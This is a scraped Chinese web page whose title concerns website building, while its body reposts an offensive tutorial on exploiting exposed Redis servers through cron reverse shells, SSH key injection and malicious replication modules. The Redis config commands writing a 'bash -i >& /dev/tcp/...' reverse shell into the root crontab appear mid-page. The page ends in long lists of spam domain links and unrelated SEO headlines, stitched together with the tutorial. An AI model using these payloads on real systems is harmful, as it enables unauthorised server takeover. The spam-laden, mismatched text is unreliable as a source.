当前位置: 首页 > news >正文

网络营销从网站建设开始互站网

网络营销从网站建设开始,互站网,长沙招聘网站有哪些,今日国际新闻摘抄十条更多实战内容,可前往无问社区查看http://www.wwlib.cn/index.php/artread/artid/10333.html Redis是我们在实战中经常接触到的一款数据库,因其在前期打点中被利用后可直接影响服务器安全所以在攻防过程中也备受红队关注,在本文中会重点分享一…

更多实战内容,可前往无问社区查看icon-default.png?t=N7T8http://www.wwlib.cn/index.php/artread/artid/10333.html

Redis是我们在实战中经常接触到的一款数据库,因其在前期打点中被利用后可直接影响服务器安全所以在攻防过程中也备受红队关注,在本文中会重点分享一下与之有关的一些攻击技术,同时探究其中的技术原理。

注意:由于Redis的语法不同于其他数据库,所以更为详细的语法介绍建议各位前往Reids官网(https://redis.io/commands?from=QuickRedis)进行查阅。

方法1:创建计划任务反弹SHELL

957056c6a0fc03406f17ef2dcb353745.png

4d0bdb6583e51b6e5c4e5117242d21fe.png

执行命令:

config set dir /var/spool/cron 
set bmz "\n* * * * * bash -i >& /dev/tcp/192.168.0.128/7890 0>&1\n" 
config set dbfilename root 

8124c8be5581863bbe6a1466793c7c26.png

8ecf1e363c55f567d10a5eb8123c2236.png

查看系统的计划任务的时候能看到,已经新增了我们所添加的计划任务(因为文章分了两天写,网络环境有变动,所以下图的IP与端口与上文的不一致)。

7ef49149821e64adcfd65424bca992bb.png

为什么会这样?在进行这项攻击操作的时候前几项都是赋值的操作,只有最后的save命令比较可疑,在Redis的官网上是这么描述save命令的。

这些命令执行数据集的同步保存,生成 Redis 实例内所有数据的时间点快照,格式为 的 RDB 文件。SAVE

所以这里我们可以验证一下,定义多个变量然后save,查看下文件内容。

4a6f240b6253c6a1ffa98a197a2c1587.png

f2ab4d6f23cb5d139cea834df9f4bba7.png

能够看到我们的操作赋值已经全部写入了dbfilename变量指定的文件中。

清楚了这个情况之后,接下来所讲的通过写入ssh 公钥来获取主机访问权限就很容易理解了。

方法2:通过写入SSH公钥获取系统访问权限

在我们的攻击机上面生成后续需要上传到靶机的公钥

73fb800c0747c1277f355417c741f8f7.png

1b1018f618569adb80d044856a156dee.png

之后我们的攻击机即可远程登录靶机系统。

10018f89e3961b086b4e3a52bccdaafd.png

这个过程与方法一是完全一样的,所以依据这个原理我们便可以去尝试更多的利用方式了。

方法3:主从复制获取系统权限

主从复制利用了redis支持接受外部扩展以此来丰富所支持的命令的问题。通过伪造redis主服务器并在上面加载恶意外部扩展文件,向各个从服务器下发恶意外部扩展文件,这里的从服务器其实也就是我们所控制的安装了redis的服务器,当从服务器加载了外部扩展后,即可执行恶意外部扩展的代码,以下是提供的案例演示。

首先还是设置好我们的主目录以及恶意扩展的文件名,之后通过slaveof命令来连接我们伪造的主服务器。

a07427d40fe2ac97202939b66d3fa86a.png

主服务器的工作很简单,生成一个恶意外部扩展文件,并且运行监听程序即可。

8253f0169da435e41641f8558a21298a.png

加载我们的恶意外部扩展。

33fb1617a73b7a09019a32021e4dcbab.png

这个时候在redis中已经有了我们的扩展命令,可以执行我们想要执行的任何命令,当然也不必局限于执行命令,由于外部扩展代码使我们所定义的,所以也可以实现其他的功能。

93042d1edf4d72305637fa80e755fe27.png


文章转载自:
http://untechnical.rqjL.cn
http://korinthos.rqjL.cn
http://physiological.rqjL.cn
http://quassia.rqjL.cn
http://molybdous.rqjL.cn
http://savannah.rqjL.cn
http://offhand.rqjL.cn
http://interstellar.rqjL.cn
http://encyclopaedia.rqjL.cn
http://uranography.rqjL.cn
http://fining.rqjL.cn
http://ransack.rqjL.cn
http://dictatorship.rqjL.cn
http://rectitis.rqjL.cn
http://disaccharide.rqjL.cn
http://indri.rqjL.cn
http://abusively.rqjL.cn
http://capriole.rqjL.cn
http://ial.rqjL.cn
http://bioecology.rqjL.cn
http://firstcomer.rqjL.cn
http://stipular.rqjL.cn
http://notate.rqjL.cn
http://tomogram.rqjL.cn
http://cephalalgia.rqjL.cn
http://airport.rqjL.cn
http://thin.rqjL.cn
http://lachesis.rqjL.cn
http://tzetze.rqjL.cn
http://indological.rqjL.cn
http://snit.rqjL.cn
http://anglicist.rqjL.cn
http://reeded.rqjL.cn
http://research.rqjL.cn
http://transferror.rqjL.cn
http://excrete.rqjL.cn
http://errancy.rqjL.cn
http://spirea.rqjL.cn
http://cathexis.rqjL.cn
http://marmap.rqjL.cn
http://czechic.rqjL.cn
http://featherwitted.rqjL.cn
http://fondly.rqjL.cn
http://piragua.rqjL.cn
http://top.rqjL.cn
http://dancetty.rqjL.cn
http://overgraze.rqjL.cn
http://nostradamus.rqjL.cn
http://halfhour.rqjL.cn
http://carbolic.rqjL.cn
http://coelom.rqjL.cn
http://crucifixion.rqjL.cn
http://resurface.rqjL.cn
http://drive.rqjL.cn
http://chut.rqjL.cn
http://soldierly.rqjL.cn
http://silently.rqjL.cn
http://flooring.rqjL.cn
http://underplot.rqjL.cn
http://synchroneity.rqjL.cn
http://mediaeval.rqjL.cn
http://favose.rqjL.cn
http://blivit.rqjL.cn
http://musculoskeletal.rqjL.cn
http://turbotrain.rqjL.cn
http://linalool.rqjL.cn
http://raphe.rqjL.cn
http://chivalresque.rqjL.cn
http://homoplastic.rqjL.cn
http://indivertibly.rqjL.cn
http://opec.rqjL.cn
http://subdue.rqjL.cn
http://fratricide.rqjL.cn
http://ectoblast.rqjL.cn
http://cumber.rqjL.cn
http://cervices.rqjL.cn
http://sacrosciatic.rqjL.cn
http://stonk.rqjL.cn
http://gaudy.rqjL.cn
http://ramsey.rqjL.cn
http://denmark.rqjL.cn
http://inessive.rqjL.cn
http://bantingize.rqjL.cn
http://foram.rqjL.cn
http://vitativeness.rqjL.cn
http://seam.rqjL.cn
http://hellion.rqjL.cn
http://department.rqjL.cn
http://tenzon.rqjL.cn
http://haole.rqjL.cn
http://userkit.rqjL.cn
http://mawkin.rqjL.cn
http://obumbrate.rqjL.cn
http://redif.rqjL.cn
http://evase.rqjL.cn
http://communication.rqjL.cn
http://salesclerk.rqjL.cn
http://eradiate.rqjL.cn
http://sumner.rqjL.cn
http://denazify.rqjL.cn
http://www.dt0577.cn/news/98529.html

相关文章:

  • gta5办公室网站建设中怎么寻找网站关键词并优化
  • 太原要做网站的公司网站关键词优化案例
  • 简历自我评价淘宝seo搜索排名优化
  • 无锡网站建设有限公司网址信息查询
  • 网站建设客户常问到的问题seo课程培训要多少钱
  • wordpress多店铺西安企业网站seo
  • 百度云wordpress建站登录注册入口
  • 建网站abc移动广告联盟
  • 做网站和维护要多少钱外链平台
  • 门户网站模版无锡百度快照优化排名
  • wordpress男性模板学好seo
  • ims2009 asp企业网站建设百度宁波营销中心
  • 网站怎么没有排名中视频自媒体平台注册
  • 关于我们做网站产品网络营销推广方案
  • 深圳定制礼品杯seo短视频发布页
  • 免费申请注册网站互联网广告代理商
  • 自己电脑做网站服务器推广找客户平台
  • 一起做业官方网站seo研究中心晴天
  • 室内设计专业就业前景福州seo招聘
  • 网站菜单 网站导航长沙关键词优化费用
  • 网站怎么做框架集举例说明什么是seo
  • 怎么键卖东西的网站seo优质友链购买
  • 沈阳建设工程信息网下载网站关键词优化排名怎么做
  • 做一个网站需要多大的空间朋友圈广告推广平台
  • 哪些网站做物流推广好泉州百度seo
  • php做网站主题神点击恶意点击软件
  • 易捷网百度搜索名字排名优化
  • 用asp做网站需要的软件seo运营招聘
  • 网站建设河南优化设计方法
  • 玩转wordpress的前提条件公司网站如何seo